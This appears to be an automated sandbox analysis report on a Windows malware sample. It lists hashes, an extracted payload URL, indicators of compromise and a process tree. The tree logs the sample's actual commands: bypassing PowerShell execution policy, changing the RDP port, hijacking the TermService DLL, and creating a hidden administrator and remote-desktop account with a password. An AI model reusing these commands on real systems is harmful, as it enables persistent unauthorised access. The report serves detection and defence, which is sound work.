Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-06-2021 14:56
Static task
static1
Behavioral task
behavioral1
Sample
7a383f57f7d2190d9af3e57d67cfb004.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
7a383f57f7d2190d9af3e57d67cfb004.exe
Resource
win10v20210408
General
-
Target
7a383f57f7d2190d9af3e57d67cfb004.exe
-
Size
6.9MB
-
MD5
7a383f57f7d2190d9af3e57d67cfb004
-
SHA1
2e783c279542ea1708854413a0cd725184f8fa78
-
SHA256
f18e085889d9d7324c57ecb800563ba2e808c0ef8ad52b7b1f1f3afa169bf836
-
SHA512
0f2509170c215efd58a09b4a00d593f087773da93f1877aab9b9f24474b06ad62494fa730fc435829a0365d7bd3d7440818a99e1b4c866882a0ed1cdc3eec9cb
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 3848 powershell.exe 20 3848 powershell.exe 21 3848 powershell.exe 22 3848 powershell.exe 24 3848 powershell.exe 26 3848 powershell.exe 28 3848 powershell.exe 30 3848 powershell.exe 32 3848 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
Vostra.exe.comVostra.exe.comVostra.exe.compid process 4256 Vostra.exe.com 3888 Vostra.exe.com 816 Vostra.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1276 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4104 4104 -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Vostra.exe.comdescription pid process target process PID 3888 set thread context of 816 3888 Vostra.exe.com Vostra.exe.com -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI388.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI39A.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI378.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_2yul2pfd.t15.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4v51yvue.3u1.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI399.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI309.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1276 powershell.exe 1276 powershell.exe 1276 powershell.exe 4024 powershell.exe 4024 powershell.exe 4024 powershell.exe 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 2300 powershell.exe 2300 powershell.exe 2300 powershell.exe 1276 powershell.exe 1276 powershell.exe 1276 powershell.exe 3848 powershell.exe 3848 powershell.exe 3848 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeIncreaseQuotaPrivilege 4024 powershell.exe Token: SeSecurityPrivilege 4024 powershell.exe Token: SeTakeOwnershipPrivilege 4024 powershell.exe Token: SeLoadDriverPrivilege 4024 powershell.exe Token: SeSystemProfilePrivilege 4024 powershell.exe Token: SeSystemtimePrivilege 4024 powershell.exe Token: SeProfSingleProcessPrivilege 4024 powershell.exe Token: SeIncBasePriorityPrivilege 4024 powershell.exe Token: SeCreatePagefilePrivilege 4024 powershell.exe Token: SeBackupPrivilege 4024 powershell.exe Token: SeRestorePrivilege 4024 powershell.exe Token: SeShutdownPrivilege 4024 powershell.exe Token: SeDebugPrivilege 4024 powershell.exe Token: SeSystemEnvironmentPrivilege 4024 powershell.exe Token: SeRemoteShutdownPrivilege 4024 powershell.exe Token: SeUndockPrivilege 4024 powershell.exe Token: SeManageVolumePrivilege 4024 powershell.exe Token: 33 4024 powershell.exe Token: 34 4024 powershell.exe Token: 35 4024 powershell.exe Token: 36 4024 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeIncreaseQuotaPrivilege 4604 powershell.exe Token: SeSecurityPrivilege 4604 powershell.exe Token: SeTakeOwnershipPrivilege 4604 powershell.exe Token: SeLoadDriverPrivilege 4604 powershell.exe Token: SeSystemProfilePrivilege 4604 powershell.exe Token: SeSystemtimePrivilege 4604 powershell.exe Token: SeProfSingleProcessPrivilege 4604 powershell.exe Token: SeIncBasePriorityPrivilege 4604 powershell.exe Token: SeCreatePagefilePrivilege 4604 powershell.exe Token: SeBackupPrivilege 4604 powershell.exe Token: SeRestorePrivilege 4604 powershell.exe Token: SeShutdownPrivilege 4604 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe Token: SeSystemEnvironmentPrivilege 4604 powershell.exe Token: SeRemoteShutdownPrivilege 4604 powershell.exe Token: SeUndockPrivilege 4604 powershell.exe Token: SeManageVolumePrivilege 4604 powershell.exe Token: 33 4604 powershell.exe Token: 34 4604 powershell.exe Token: 35 4604 powershell.exe Token: 36 4604 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeIncreaseQuotaPrivilege 2300 powershell.exe Token: SeSecurityPrivilege 2300 powershell.exe Token: SeTakeOwnershipPrivilege 2300 powershell.exe Token: SeLoadDriverPrivilege 2300 powershell.exe Token: SeSystemProfilePrivilege 2300 powershell.exe Token: SeSystemtimePrivilege 2300 powershell.exe Token: SeProfSingleProcessPrivilege 2300 powershell.exe Token: SeIncBasePriorityPrivilege 2300 powershell.exe Token: SeCreatePagefilePrivilege 2300 powershell.exe Token: SeBackupPrivilege 2300 powershell.exe Token: SeRestorePrivilege 2300 powershell.exe Token: SeShutdownPrivilege 2300 powershell.exe Token: SeDebugPrivilege 2300 powershell.exe Token: SeSystemEnvironmentPrivilege 2300 powershell.exe Token: SeRemoteShutdownPrivilege 2300 powershell.exe Token: SeUndockPrivilege 2300 powershell.exe Token: SeManageVolumePrivilege 2300 powershell.exe Token: 33 2300 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7a383f57f7d2190d9af3e57d67cfb004.execmd.execmd.exeVostra.exe.comVostra.exe.comVostra.exe.compowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4656 wrote to memory of 3676 4656 7a383f57f7d2190d9af3e57d67cfb004.exe cmd.exe PID 4656 wrote to memory of 3676 4656 7a383f57f7d2190d9af3e57d67cfb004.exe cmd.exe PID 4656 wrote to memory of 3676 4656 7a383f57f7d2190d9af3e57d67cfb004.exe cmd.exe PID 3676 wrote to memory of 3036 3676 cmd.exe cmd.exe PID 3676 wrote to memory of 3036 3676 cmd.exe cmd.exe PID 3676 wrote to memory of 3036 3676 cmd.exe cmd.exe PID 3036 wrote to memory of 60 3036 cmd.exe findstr.exe PID 3036 wrote to memory of 60 3036 cmd.exe findstr.exe PID 3036 wrote to memory of 60 3036 cmd.exe findstr.exe PID 3036 wrote to memory of 4256 3036 cmd.exe Vostra.exe.com PID 3036 wrote to memory of 4256 3036 cmd.exe Vostra.exe.com PID 3036 wrote to memory of 4276 3036 cmd.exe PING.EXE PID 3036 wrote to memory of 4276 3036 cmd.exe PING.EXE PID 3036 wrote to memory of 4276 3036 cmd.exe PING.EXE PID 4256 wrote to memory of 3888 4256 Vostra.exe.com Vostra.exe.com PID 4256 wrote to memory of 3888 4256 Vostra.exe.com Vostra.exe.com PID 3888 wrote to memory of 816 3888 Vostra.exe.com Vostra.exe.com PID 3888 wrote to memory of 816 3888 Vostra.exe.com Vostra.exe.com PID 3888 wrote to memory of 816 3888 Vostra.exe.com Vostra.exe.com PID 3888 wrote to memory of 816 3888 Vostra.exe.com Vostra.exe.com PID 816 wrote to memory of 1276 816 Vostra.exe.com powershell.exe PID 816 wrote to memory of 1276 816 Vostra.exe.com powershell.exe PID 1276 wrote to memory of 2616 1276 powershell.exe csc.exe PID 1276 wrote to memory of 2616 1276 powershell.exe csc.exe PID 2616 wrote to memory of 2680 2616 csc.exe cvtres.exe PID 2616 wrote to memory of 2680 2616 csc.exe cvtres.exe PID 1276 wrote to memory of 4024 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 4024 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 4604 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 4604 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 2300 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 2300 1276 powershell.exe powershell.exe PID 1276 wrote to memory of 3952 1276 powershell.exe reg.exe PID 1276 wrote to memory of 3952 1276 powershell.exe reg.exe PID 1276 wrote to memory of 4892 1276 powershell.exe reg.exe PID 1276 wrote to memory of 4892 1276 powershell.exe reg.exe PID 1276 wrote to memory of 4980 1276 powershell.exe reg.exe PID 1276 wrote to memory of 4980 1276 powershell.exe reg.exe PID 1276 wrote to memory of 1340 1276 powershell.exe net.exe PID 1276 wrote to memory of 1340 1276 powershell.exe net.exe PID 1340 wrote to memory of 3440 1340 net.exe net1.exe PID 1340 wrote to memory of 3440 1340 net.exe net1.exe PID 1276 wrote to memory of 3564 1276 powershell.exe cmd.exe PID 1276 wrote to memory of 3564 1276 powershell.exe cmd.exe PID 3564 wrote to memory of 3596 3564 cmd.exe cmd.exe PID 3564 wrote to memory of 3596 3564 cmd.exe cmd.exe PID 3596 wrote to memory of 776 3596 cmd.exe net.exe PID 3596 wrote to memory of 776 3596 cmd.exe net.exe PID 776 wrote to memory of 4220 776 net.exe net1.exe PID 776 wrote to memory of 4220 776 net.exe net1.exe PID 1276 wrote to memory of 3032 1276 powershell.exe cmd.exe PID 1276 wrote to memory of 3032 1276 powershell.exe cmd.exe PID 3032 wrote to memory of 3236 3032 cmd.exe cmd.exe PID 3032 wrote to memory of 3236 3032 cmd.exe cmd.exe PID 3236 wrote to memory of 4256 3236 cmd.exe net.exe PID 3236 wrote to memory of 4256 3236 cmd.exe net.exe PID 4256 wrote to memory of 5012 4256 net.exe net1.exe PID 4256 wrote to memory of 5012 4256 net.exe net1.exe PID 2668 wrote to memory of 4724 2668 cmd.exe net.exe PID 2668 wrote to memory of 4724 2668 cmd.exe net.exe PID 4724 wrote to memory of 4672 4724 net.exe net1.exe PID 4724 wrote to memory of 4672 4724 net.exe net1.exe PID 648 wrote to memory of 4168 648 cmd.exe net.exe PID 648 wrote to memory of 4168 648 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\cmd < Poi.vsd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd4⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comVostra.exe.com D4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com D5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdline"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD38.tmp" "c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMP"9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc DI6t4nmh /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc DI6t4nmh /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc DI6t4nmh /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
